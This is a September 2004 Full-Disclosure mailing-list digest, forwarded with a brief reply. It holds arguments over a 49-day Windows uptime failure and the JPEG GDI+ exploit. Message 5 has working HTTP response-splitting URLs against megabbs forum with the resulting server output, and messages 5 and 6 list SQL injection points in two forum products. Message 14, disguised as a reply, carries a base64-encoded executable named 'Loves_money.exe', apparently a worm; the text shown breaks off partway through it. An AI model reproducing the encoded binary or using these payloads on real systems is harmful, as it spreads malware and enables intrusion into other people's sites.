It is possible to view a JPEG in a unpatched IE and it will automatic
install programs.
This is my understanding.
-----Original Message-----
From: full-disclosure-admin@lists.netsys.com
[mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of milw0rm
Inc.
Sent: Monday, September 27, 2004 1:12 PM
To: full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] Re: Full-Disclosure digest, Vol 1 #1933 - 20
msgs
JPEG GDI problem,
Isn't this problem only capable of running if the jpeg was opened via
the users actions?
Is it possible that webpages could be effected with jpegs with
internet explorer viewing them? I wouldn't think so since what I have
read from multiple peoples articles that it isn't this kind of bug.
Info needed.
Regards,
str0ke
On Mon, 27 Sep 2004 12:00:05 -0400,
full-disclosure-request@lists.netsys.com
<full-disclosure-request@lists.netsys.com> wrote:
Send Full-Disclosure mailing list submissions to
full-disclosure@lists.netsys.com
To subscribe or unsubscribe via the World Wide Web, visit
http://lists.netsys.com/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
full-disclosure-request@lists.netsys.com
You can reach the person managing the list at
full-disclosure-admin@lists.netsys.com
When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."
Today's Topics:
1. RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x
repeat 9/11 (Exibar)
2. RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to 200x
repeat 9/11 (Ron DuFresne)
3. RE: Full-Disclosure: JEPG Hype or Hope? (RandallM)
4. SANS GDIscan (bashis)
5. HTTP Response Splitting and SQL injection in megabbs forum
(pigrelax)
6. SQL injection in BroadBoard Instant ASP Message Board (pigrelax)
7. Re: HTTP Response Splitting and SQL injection in megabbs forum
(PD9 Software)
8. Re: Re: HTTP Response Splitting and SQL injection in megabbs
forum (DanB UK)
9. RE: Windoze almost managed to 200x repeat 9/11 (joe)
10. Re: Windoze almost managed to 200x repeat 9/11 (Barry
Fitzgerald)
11. Re: Windoze almost managed to 200x repeat 9/11 (Vince Able)
12. Re: Windoze almost managed to 200x repeat 9/11 (ASB)
13. RE: Full-Disclosure: JEPG Hype or Hope? (r00t3d)
14. Re: Msg reply (Elvi)
15. [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows
in
libXpm (Thierry Carrez)
16. [gentoo-announce] [ GLSA 200409-34 ] X.org, XFree86: Integer and
stack overflows in
libXpm (Thierry Carrez)
17. [SECURITY] [DSA 553-1] New getmail packages fix root compromise
(debian-security-announce@lists.debian.org)
--__--__--
Message: 1
From: "Exibar" <exibar@thelair.com>
To: "ASB" <abaker@gmail.com>, <full-disclosure@lists.netsys.com>
Subject: RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to
200x repeat 9/11
Date: Sun, 26 Sep 2004 12:15:26 -0400
Exactly. Some idiot decided to program the entire system to shut down
after
49 days. What an idiot, why not just setup a maintenance program to
perform
a scheduled re-boot of the system instead of having an automated
proecess
shut down the system and then have to schedule a work around for this
by
scheduling a manual boot every 30 days (which someone forgot).
This whole thing wasn't Windows' fault, but an idiot
programmer/manager/whatever fault.
Exibar
-----Original Message-----
From: ASB [mailto:abaker@gmail.com]
Sent: Sunday, September 26, 2004 10:56 AM
To: full-disclosure@lists.netsys.com
Subject: [inbox] Re: [Full-Disclosure] Windoze almost managed to
200x
repeat 9/11
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Next time, please read the thread in context.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The context of the thread is that an application issue is being
incorrectly interpreted as an OS issue.
-ASB
On Fri, 24 Sep 2004 14:43:53 -0400, Barry Fitzgerald
<bkfsec@sdf.lonestar.org> wrote:
ASB wrote:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Where issues like this relate to the OS is in the fact that the
OS
itself shouldn't be brought down by a poorly designed app.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
And where in that article did you read that the OS was brought
down by
a poorly designed app?
I didn't... I was reponding to a point that was made about
applications
being reponsible for system failures.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Was it MS Windows that actually held the code that brought
the system down?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The article was pretty clear:
<snip>
How you managed to read "OS failure" into this is rather
astounding...
How you manage to get up in the morning is rather astounding.
Next time, please read the thread in context.
Also, if you think that that's a detailed assessment of the
problem,
you're not too bright.
So try and think a little harder next time, and not be so
abbrassive.
You may be having a bad day (most likely due to your poor
attitude) but
don't take your own misunderstanding out on others, mmkay?
-Barry
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
--__--__--
Message: 2
Date: Sun, 26 Sep 2004 11:48:22 -0500 (CDT)
From: Ron DuFresne <dufresne@winternet.com>
To: Exibar <exibar@thelair.com>
cc: ASB <abaker@gmail.com>, <full-disclosure@lists.netsys.com>
Subject: RE: [inbox] Re: [Full-Disclosure] Windoze almost managed to
200x
repeat 9/11
On Sun, 26 Sep 2004, Exibar wrote:
Exactly. Some idiot decided to program the entire system to shut
down after
49 days. What an idiot, why not just setup a maintenance program to
perform
a scheduled re-boot of the system instead of having an automated
proecess
shut down the system and then have to schedule a work around for
this by
scheduling a manual boot every 30 days (which someone forgot).
Which, likely in this case, would have to somehow be monitored, seems
to
be a pretty critical application, one in which lives are dependant,
and it
is entirely possible the system might not recover from a reboot.
Thanks,
Ron DuFresne
--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
--__--__--
Message: 3
From: "RandallM" <randallm@fidmail.com>
To: <full-disclosure@lists.netsys.com>
Date: Sun, 26 Sep 2004 12:02:20 -0500
Subject: [Full-Disclosure] RE: Full-Disclosure: JEPG Hype or Hope?
What exactly would one gain by creating a PoC on this exploit?
How exactly does this compare to meaningful disclosures that were
revealed because someone would not listen or ignored the warnings
of their security vulnerability.
I mean, this is nothing like a program goof that allows clear-text
Passwords or exposes files or the like. This exploit (if it can be
called that) took a lot of thought to create it and exploit it.
Correct me if I'm wrong but it does not fall in to the category
of "exploit" as defined by this list. This was truly a "created
Exploit"
that would not be their otherwise. This took intelligent input.
This is nothing more then a black-hat attack. It is not a meaningful
revealing of poor security as I've seen defined on this list.
<|>-- __--__--
<|>
<|>Message: 13
<|>From: "i.t " <fulldis@it97.dyndns.org>
<|>Organization: i.t consulting
<|>To: full-disclosure@lists.netsys.com
<|>Date: Sun, 26 Sep 2004 11:57:33 +0200
<|>Subject: [Full-Disclosure] Re: MS04-028 Jpeg EXPLOIT - msn
<|>
<|>
<|>> On Saturday 25 September 2004 16:59, raza wrote:
<|>> > I just compiled this and it works well..
<|>> >
<|> ...
<|>> yes and it works very well.
<|>> > I can see this ones gaana be fun...
<|>> We'll have a worm within days.
<|>
<|>for nearly all of my clients using win xp I've deinstalled
<|>win messenger.
<|>one urgently wanted it back for communicating in real-time;
<|>and, of course,
<|>it's much more fun seeing a live picture of the
<|>counterpart(s) in the chat
<|>window...
<|>
<|>even having installed sp2 and the newest patches plus AV I
<|>can imagine a virus
<|>spreading within those pictures throughout the whole msn and so
on...
<|>any other defense?
<|>or ist this too much paranoia?
<|>
<|>i.t
<|>
<|>
<|>-- __--__--
--__--__--
Message: 4
To: full-disclosure@lists.netsys.com
Date: Sun, 26 Sep 2004 17:34:04 +0200 (CEST)
From: bashis <mcw@wcd.se>
Reply-To: mcw@wcd.se
Subject: [Full-Disclosure] SANS GDIscan
Hi
I tested [1] 'gdiscan' from SANS, and this tool reports vulnerable
DLL's after
installing all availible patches from M$..
WinXP Pro SP1
C:\WINDOWS\system32\gdiplus.dll
Version: 5.1.3097.0 <-- Vulnerable version
Win2k Server SP4
C:\Program Files\Common Files\Microsoft Shared\Ink\gdiplus.dll
Version: 5.1.3097.0 <-- Vulnerable version
[1]
http://isc.sans.org/gdiscan.php
Have a nice day
/bashis
--__--__--
Message: 5
From: "pigrelax" <pigrelax@yandex.ru>
To: <full-disclosure@lists.netsys.com>
Cc: <bugtraq@Securityfocus.com>, <info@pd9soft.com>
Date: Sun, 26 Sep 2004 21:56:44 +0400
Subject: [Full-Disclosure] HTTP Response Splitting and SQL injection
in megabbs forum
URL: http://www.pd9soft.com
Tested megabbs 2.1
1. HTTP Response Splitting
http://www.pd9soft.com/megabbs/forums/thread-post.asp?action=writenew&fi
d=%0
d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type
:%20
text/html%0d%0aContent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20
Maxp
atrol%3c/html%3e%0d%0a&tid=4924&replyto=22947&displaytype=flat
Result:
<...>
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:14:02 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33
<html>Scanned by Maxpatrol</html>
Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:13:02 GMT
Set-Cookie: guestID=309; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=KNEIJIEDEMJPNNKPNFONOIFL; path=/
Cache-contro
<...>
2. HTTP Response Splitting
http://www.pd9soft.com/megabbs/forums/thread-post.asp?fid=%0d%0aContent-
Leng
th:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d
%0aC
ontent-Length:%2033%0d%0a%0d%0a%3chtml%3eScanned%20by%20Maxpatrol%3c/htm
l%3e
%0d%0a&action=writenew&displaytype=flat
Result:
<...>
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 26 Sep 2004 14:34:05 GMT
Server: Microsoft-IIS/6.0
Location: /megabbs/forums/forum-view.asp?fid=
Content-Length: 0
HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 33
<html>Scanned by Maxpatrol</html>
Content-Length: 290
Content-Type: text/html
Expires: Sun, 26 Sep 2004 14:33:05 GMT
Set-Cookie: guestID=421; path=/
Set-Cookie: ASPSESSIONIDAQRTADCB=HCGIJIEDMBPIHPCDJFKACJAC; path=/
Cache-contro
<...>
3. More and more SQL injection:
ladder-log.asp?categoryid=1&sortby=completeddate&sortdir=1'
ladder-log.asp?categoryid=1&filter=id&criteria=1'
view-profile.asp?type=single&memberid=1'
view-profile.asp?type=team&teamid=1'
MaxPatrol is a professional network security scanner distinguished by
its
uncompromisingly high quality of scanning, optimized for effective use
by
companies of any size (serving from a few to tens of thousands of
nodes).
MaxPatrol developers were able quite simply to "ignore" about 40% of
the
newly published vulnerabilities because their product's intelligent
algorithms had already detected them.
http://www.Maxpatrol.com
--__--__--
Message: 6
From: "pigrelax" <pigrelax@yandex.ru>
To: <full-disclosure@lists.netsys.com>
Cc: <bugtraq@Securityfocus.com>
Date: Mon, 27 Sep 2004 00:09:32 +0400
Subject: [Full-Disclosure] SQL injection in BroadBoard Instant ASP
Message Board
BroadBoard Instant ASP Message Board
URL: http://www.broadboard.com/
1. software does not properly validate user-supplied input in the
'keywords'
parameter in search.asp:
http://broadboard/forum/search.asp?archives=1&action=1&keywords=['SQL
code]&method=1&method=1&body=1&subject=1&board=1&results=1
2. software does not properly validate user-supplied input in the
'handle'
parameter in profile.asp:
http://broadboard/forum/profile.asp?handle=['SQL code]
3. software does not properly validate user-supplied input in the
'txtUserHandle' parameter in reg2.asp:
POST /forum/reg2.asp HTTP/1.1
Host: broadboard
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
txtNameFirst=1&txtNameLast=1&txtUserEmail=sales@maxpatrol.com&txtUserHan
dle=
['SQL code]&txtUserPwd=1&txtUserCPwd=1&cmdRegister=1
4. software does not properly validate user-supplied input in the
'txtUserEmail' parameter in forgot.asp:
POST /forum/forgot.asp HTTP/1.1
Host: broadboard
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
txtUserEmail=['SQL code]&cmdSend=1
MaxPatrol is a professional network security scanner distinguished by
its
uncompromisingly high quality of scanning, optimized for effective use
by
companies of any size (serving from a few to tens of thousands of
nodes).
MaxPatrol developers were able quite simply to "ignore" about 40% of
the
newly published vulnerabilities because their product's intelligent
algorithms had already detected them.
http://www.Maxpatrol.com
--__--__--
Message: 7
Date: Sun, 26 Sep 2004 13:50:50 -0500
From: PD9 Software <info@pd9soft.com>
CC: full-disclosure@lists.netsys.com, bugtraq@Securityfocus.com
Subject: [Full-Disclosure] Re: HTTP Response Splitting and SQL
injection in megabbs forum
pigrelax wrote:
URL: http://www.pd9soft.com
Tested megabbs 2.1
1. HTTP Response Splitting
2. HTTP Response Splitting
3. More and more SQL injection:
All three issues have been addressed, and updates have been posted at
http://www.pd9soft.com/. Thank you for bringing them to my attention.
However in the future, would it be too much to ask that I am contacted
first? I am very eager to fix any security vulnerabilities, but
sipping
coffee on a lazy Sunday afternoon and seeing this broadcast to a
public
list is a little disconcerting.
Thanks,
Matt Summers
PD9 Software, Inc
--__--__--
Message: 8
Date: Sun, 26 Sep 2004 23:12:42 +0100
From: DanB UK <danbuk@gmail.com>
Reply-To: DanB UK <danbuk@gmail.com>
To: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] Re: HTTP Response Splitting and SQL
injection in megabbs forum
It seems like the OP was actually just trying to advertise their(or
affiliates) product.
I would say that its not the 'done' thing.
However in the future, would it be too much to ask that I am
contacted
first? I am very eager to fix any security vulnerabilities, but
sipping
coffee on a lazy Sunday afternoon and seeing this broadcast to a
public
list is a little disconcerting.
I understand your concern.
Regards,
Daniel
--
DanB UK
London, UK
--__--__--
Message: 9
From: "joe" <mvp@joeware.net>
To: "'devis'" <devis@easynix.net>
Cc: <full-disclosure@lists.netsys.com>
Subject: RE: [Full-Disclosure] Windoze almost managed to 200x repeat
9/11
Date: Sun, 26 Sep 2004 18:42:29 -0400
I get paid nothing to hang out on this list. In fact many of my
friends feel
I am wasting considerable time here because the vast majority of the
people
are Linux bigots simply holding each others', ummm, hands.
Once in a while though some seriously good information or conversation
occurs here which is why I like to hang out and most of my responses
tend to
be offlist. Occasionally I like to dampen some of the occasional this
or
that about how bad Windows sucks from people who don't know enough
about how
it works to even have a very good opinion. They are intelligent people
mostly, they just have a hamster up their bum about billg or MS for
some
reason.
It is funny to me how this thread came onto the list as a "Windows
sucks"
thread when it should have been a serious, "some programmers don't
understand data types sucks" thread. It is poor programming habits
like this
that cause a great deal of the flaws in apps and OSes that others take
advantage of. Programmers need to understand the proper way to handle
the
datatypes they use in their applications, whether it be checking for
data
size constraints or data range constraints.
As for missing out on cash or something from MS, I am not so sure MS
would
have me as an employee at the moment as I spend considerable time
banging on
them and their OS and choices. I don't do it out in the public lists
like
this as I am trying to be a rightous d00d to all of you cool people. I
bang
on them in the private groups that have MS people seriously looking to
make
things better.
For this specific thread, my main point is that someone who can't
figure out
that an unsigned integer value that is incrementing will roll at some
point
is a dangerous programmer no matter what OS they are on. This has
nothing to
do with Windows or any OS. It is how computers work period. There
isn't a
single OS out there that you could constantly increment a 32 bit
unsigned
counter and not roll to zero. This is way below anything the OS can
control.
At best it halts the program as soon as the overflow kicks. That
really
wouldn't help much except possibly with data corruption. I don't think
an OS
should protecting apps from data corruption due to the app losing
count
though.
joe
-----Original Message-----
From: full-disclosure-admin@lists.netsys.com
[mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of devis
Sent: Saturday, September 25, 2004 12:49 PM
Cc: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat
9/11
Joe dude, how much u are getting from M$ a month to hang around this
list ?
Zero ? Noway....send em a letter now dude.
And please don't serve me, 'just being objective crap', you HAVE to
be
interested to defend it that well., if not, well, you may be missing
on
something...
joe wrote:
Definitely some interesting theories Ron.
1> the code was better done under the original OS, unix
While possible, nothing actually points at this as being the case.
Anyway, I would be curious as to the functionality of the system when
it was first launched on UNIX versus the end-result. Put this on
Windows and run it 10 years and then port to UNIX or *nix and there
will almost certainly be screwups there as well. In fact, I would be
pretty confident. I have dealt with poor ports to and from Windows
and
*nix. I have even dealt with bad ports from Mainframes to UNIX where
the whole time the Mainframe people were saying the same types of
things about UNIX that you like to say about Windows. Being a good
coder for one OS doesn't make you one for all Oses when dealing with
system
level components and interfaces.
2> considering "how often" you seems to run into this same
issue with other coders in the windows realm, windows coders tend to
be especially lazy/clueless as compared to coders in other OS'
I would expect the issue is the same as always. Sheer volume. There
are
good and bad coders period. Microsoft has surely drawn more poor
coders
than any other OS with its pushing of the RAD/simple coding
environment
such as VB.
Additionally the Windows environment as a whole has more
inexperienced
users and admins and people likely to try and code. There are also
many
good ones as well, they are just well buried in the poor ones.
3> tools to code with in the windows realm are not as
3> developed/functional
as they are in other envs
I would say this opinion is uninformed.
4> M$ does not properly provide developers with clued information
with
which to do their jobs
This is another opinion which I would call rather uninformed.
Even if there was poor function documentation, if you have a
function,
any function returning a constantly increasing counter you know, as a
skilled programmer, that eventually it has to do something other than
increase. If the value is signed the sign bit will flip or if it is
unsigned it will roll to 0. How can a good programmer think any other
thing? The compiler could have inserted exception handling code but
at
best that is simply going to bounce the program out of a normal
running
state. That is a compiler thing though, not an OS thing. I do hope
you
aren't trying to tell me that UNIX can magically and infinitely
maintain a counter on a variable with a fixed bit size. I try to
consider
you to be a bit more intelligent than that.
To put it in anotehr way, if you have a set of tires on a car that
are
rated for 75 MPH (say off road truck tires) and some person goes 90
and
the tires fly apart or the vehicle flips or both, is the issue the
driver, the vehicle manufacturer, the tire manufacturer, or the tree
that produced the rubber for the tire? This is the same sort of case.
You have it in your mind ahead of time who you want to be at fault
because you have a bug up your bum about it and work to prove that
stance.
Poor coding is a result of poor coders. I have seen amazingly bad
code
on all OS/RTS platforms I have worked on from RSTS to BSD to Linux to
Windows to DOS to VMS. I have also seen some amazingly good stuff on
the same platforms. Someone who doesn't understand basic data types
and
how to handle their limits is going to do a shitty job on all of the
platforms.
Is the ratio of good admins to bad admins better in UNIX versus
Windows?
Absolutely. Is the ratio of good programmers to bad programmers
better
in UNIX versus Windows? Most certainly. Does this mean all Windows
admins are bad admins, obviously not. Does this mean all Windows
programmers are bad programmers, obviously not. I specifically say
UNIX
versus *nix because I think *nix is one or more steps closer to
Windows
in this discussion and getting closer as its popularity grows with
Windows users. Switching to *nix doesn't make the admins or coders
switching (or just using in tandem) any better simply because they
switched.
-----Original Message-----
From: Ron DuFresne [mailto:dufresne@winternet.com]
Sent: Friday, September 24, 2004 11:25 PM
To: joe
Cc: mcw@wcd.se; full-disclosure@lists.netsys.com
Subject: RE: [Full-Disclosure] Windoze almost managed to 200x repeat
9/11
On Fri, 24 Sep 2004, joe wrote:
Again, there are valid uses of GetTickCount and there are safe ways
of
doing so. If there is concern, I do recommend testing functionality
associated with each of the DLLs. You might find a bug you can
report
for
kudos.
On the incident, I would guess the vendor never had a clue it would
do
that.
That function can't return more than 49.7 days without breaking
every
app that currently uses it. MS can not do that. That is why there is
another function to get the info with a different datatype. See my
other
posts.
What seems to read clearly from your replies to this thread is that
either;
1> the code was better done under the original OS, unix
2> considering "how often" you seems to run into this same issue with
other coders in the windows realm, windows coders tend to be
especially
lazy/clueless as compared to coders in other OS'
3> tools to code with in the windows realm are not as
3> developed/functional
as they are in other envs
4> M$ does not properly provide developers with clued information
with
which to do their jobs
From which you can combine any or all of the above for a correct
interpretation of the total of your replies.
Thanks,
Ron DuFresne
--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
--__--__--
Message: 10
Date: Sun, 26 Sep 2004 20:41:34 -0400
From: Barry Fitzgerald <bkfsec@sdf.lonestar.org>
To: ASB <abaker@gmail.com>
CC: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat
9/11
ASB wrote:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Next time, please read the thread in context.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The context of the thread is that an application issue is being
incorrectly interpreted as an OS issue.
Oversimplification is for the foolish. Like I said, you're not too
bright.
You're showing very little understanding of system architecture here.
My point regarding where the code was located had to do with a
generalized statement regarding applications being at fault for issues
and for them not being OS issues. My point was that it's not always
clear cut.
I was not trying to say that this case was an OS issue. I was trying
to
say that the line is not always black and white. I was also pointing
out that none of us know because the only information we have to go on
is third-hand and imprecise. If you can predict conditions based on
imprecise third-hand information, then what are you doing here?!? Go
solve the world's problems or something. of course, you can't so
you've
decided to just flame people.
Please re-read my posts and think before you respond.
If, besides misreading my posts, you can find no argument with what
I've
said (which, you won't, because I'm right) then I'm willing to hear
them. Other than that, you're just wasting everyone's time by trying
to
railroad points that you don't understand.
-Barry
--__--__--
Message: 11
From: "Vince Able" <we_hate_vince@hotmail.com>
To: <full-disclosure@lists.netsys.com>
Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat
9/11
Date: Sun, 26 Sep 2004 21:24:27 -0400
Organization: The Ram Group
Well what a nice first post to read entering Full-Disclosure. LoL
----- Original Message -----
From: "Barry Fitzgerald" <bkfsec@sdf.lonestar.org>
To: "ASB" <abaker@gmail.com>
Cc: <full-disclosure@lists.netsys.com>
Sent: Sunday, September 26, 2004 8:41 PM
Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat
9/11
ASB wrote:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Next time, please read the thread in context.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The context of the thread is that an application issue is being
incorrectly interpreted as an OS issue.
Oversimplification is for the foolish. Like I said, you're not too
bright.
You're showing very little understanding of system architecture
here.
My point regarding where the code was located had to do with a
generalized statement regarding applications being at fault for
issues
and for them not being OS issues. My point was that it's not always
clear cut.
I was not trying to say that this case was an OS issue. I was
trying to
say that the line is not always black and white. I was also
pointing
out that none of us know because the only information we have to go
on
is third-hand and imprecise. If you can predict conditions based on
imprecise third-hand information, then what are you doing here?!?
Go
solve the world's problems or something. of course, you can't so
you've
decided to just flame people.
Please re-read my posts and think before you respond.
If, besides misreading my posts, you can find no argument with what
I've
said (which, you won't, because I'm right) then I'm willing to hear
them. Other than that, you're just wasting everyone's time by
trying to
railroad points that you don't understand.
-Barry
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
--__--__--
Message: 12
Date: Sun, 26 Sep 2004 22:36:12 -0400
From: ASB <abaker@gmail.com>
Reply-To: ASB <abaker@gmail.com>
To: full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] Windoze almost managed to 200x repeat
9/11
There was more than enough information provided in the initial link,
besides what was available to those who took a moment or 3 to search
for additional info, to avoid coming to the conclusion that the OS was
the fault here.
The mere fact that thousands, if not millions of people manage to run
Windows 2000 systems which do not keel over every 49.7 days, would
tend to cause one to look elsewhere for the source of the issue.
Beyond that, the wording of the various articles on this issue that I
looked at, made it rather obvious that there was an issue with the
APPLICATION which rendered it useless if certain operator steps were
not performed. No matter how scanty you feel the articles were, they
never even implied that the OS was inoperable during any of this.
While it is certainly important to have as much information as
possible before rendering verdicts of any sort, and while not every
issue can be definitively outlined as jet black or lily white, there's
not a whole lot more forensics that's needed to conclude that the root
of the issue is one of application development, compounded by the
failure of an operator to perform a prescribed workaround at the
appointed time.
The irony here is that you're accusing me of not reading or
comprehending.
-ASB
On Sun, 26 Sep 2004 20:41:34 -0400, Barry Fitzgerald
<bkfsec@sdf.lonestar.org> wrote:
ASB wrote:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Next time, please read the thread in context.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The context of the thread is that an application issue is being
incorrectly interpreted as an OS issue.
Oversimplification is for the foolish. Like I said, you're not too
bright.
You're showing very little understanding of system architecture
here.
My point regarding where the code was located had to do with a
generalized statement regarding applications being at fault for
issues
and for them not being OS issues. My point was that it's not always
clear cut.
I was not trying to say that this case was an OS issue. I was
trying to
say that the line is not always black and white. I was also
pointing
out that none of us know because the only information we have to go
on
is third-hand and imprecise. If you can predict conditions based on
imprecise third-hand information, then what are you doing here?!?
Go
solve the world's problems or something. of course, you can't so
you've
decided to just flame people.
Please re-read my posts and think before you respond.
If, besides misreading my posts, you can find no argument with what
I've
said (which, you won't, because I'm right) then I'm willing to hear
them. Other than that, you're just wasting everyone's time by
trying to
railroad points that you don't understand.
-Barry
--__--__--
Message: 13
Date: Sun, 26 Sep 2004 22:20:29 -0700
From: r00t3d <r00t3d@gmail.com>
Reply-To: r00t3d <r00t3d@gmail.com>
To: randallm@fidmail.com, full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] RE: Full-Disclosure: JEPG Hype or Hope?
Dear RandallM,
This exploit (if it can becalled that) took a lot of thought to
create it and exploit it.
Yea, lots of thought, and ripped shellcode to boot! Can't beat that
can ya?
Correct me if I'm wrong but it does not fall in to the category
of "exploit" as defined by this list.
Okay, you're wrong.
This was truly a "created Exploit"
Seriously? I didn't know exploits were "created" I always thought they
just appeared.
This is nothing more then a black-hat attack. It is not a meaningful
revealing of poor security as I've seen defined on this list.
Uh oh, are the blaqhats after us again?? I think we had all better
just pull our whitehats down over our heads and hope they go away. I
hear, if you don't move, the blaqhats won't notice you and will leave,
kind of like with bears. Anyways, last time I checked, it was't
blaqhats that disclosed exploits, it was whitehats and scene whores.
Love,
#MSNetworks
--__--__--
Message: 14
Date: Mon, 27 Sep 2004 09:03:35 +0200
To: "Full-disclosure" <full-disclosure@lists.netsys.com>
From: "Elvi" <elvi52001@yahoo.com>
Subject: [Full-Disclosure] Re: Msg reply
----------tthzhwewredcturxosqp
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit
<html><body>
<br>
</body></html>
----------tthzhwewredcturxosqp
Content-Type: application/octet-stream; name="Loves_money.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Loves_money.exe"
TVoAAAEAAAACAAAA//8AAEAAAAAAAAAAQAAAAAAAAAC0TM0hAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAkAAAAKkm3RPtR7NA7UezQO1Hs0DtR7NA7kezQGNYoEBtR7NAEWehQOxHs0AqQbVA
7EezQFJpY2jtR7NAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBAwDMD5BAAAAAAAAA
AADgAA8BCwEFDABQAAAAEAAAAJAAAPDiAAAAoAAAAPAAAAAAQAAAEAAAAAIAAAQAAAAAAAAA
BAAAAAAAAAAAAAEAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAA
AACk8wAATAIAAADwAACkAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAABVUFgwAAAAAACQAAAAEAAAAAAAAAACAAAAAAAAAAAAAAAAAACAAADg
VVBYMQAAAAAAUAAAAKAAAABGAAAAAgAAAAAAAAAAAAAAAAAAQAAA4C5yc3JjAAAAABAAAADw
AAAABgAAAEgAAAAAAAAAAAAAAAAAAEAAAMAxLjI0AFVQWCEMCQIIvyc9X9rQb57HxwAAyUIA
AACSAAAmAADM////m/rJOnEqKxiQ86MrEIn8ewjaeUIXGA5z7n9eUr/9//+6+gQ6jxg5r3EW
rHG/8nGP9nG36hniLTsQ8sj83P+x3d8FO3H+Jsk4vBgSpDM49vora+237yoNKgWP6gL2qhI6
BQANGX/79gd5Pg6S+to1kPoSYTT6c78GPb//vsW+DoKQATDyEi26DXe/Aqr/m697KRIGFVN5
hwL6j/gR6QWPd2/ukQIOEmpbQw4RNQ8SqrrbNnNgRmqHDnf+arf23GbiWVqlyOxH8vi32d7f
if4ZkP6SFqS9Bf8Lve3BtqrLB8koDUdoJu72rdw1rQZx/PY7E/hACVEJ7z6y/Xkb+QlQpR7y
qXGn9iGQ4BJj8pT9d0l5OpsGULGPC6Ef8BKDe+cWMsqxuPsSSsWpyq11f/E6jvSqkJQlDLso
xH8WusGDrEWPhIfJIRmuw5ft/1Y7Gup5A/uO8VacCfL4jvtWmgd5e3gS6BLHmDgJ9hLJ/BJv
7d2R0xLYBrl5AehIQpxC9wit/f/wnFF5E/mDSA0j0QNKx9CRxP////95GsXGxInoxs6J8P67
xqGI9f78EfH+BhH91sQ6Gvj+6x7aw9FQSamQaSShf7N9Q4d7yXEi4CIGYTMFCFR63/Z7u76O
47ISdMTTj/1Zoe1znTFz//x5PP4RIEL7iBIYBnaFn9vekvgVU3AEJE29vS72dxeEQ/oTcu7A
BDgYAxJi1vht4zy/BHEzwHD+wXK/hQ2y7e62CMsF9UyvCcByFXDs24W3BcC7wSiI+CgEOY8v
2LcX3NlqArmP8nD5PAdwbMQW2rn7BdwBV4wC/rX24+S6BBtPA+7Ccq9t79vdY68GDQZwDAQX
kcKb61yLEBoJBfh6pHHdurdvQMruygUFGDpwI/kEBnLfPkmvYOYZcbrG+QX1Tbr8hd0tCNbi
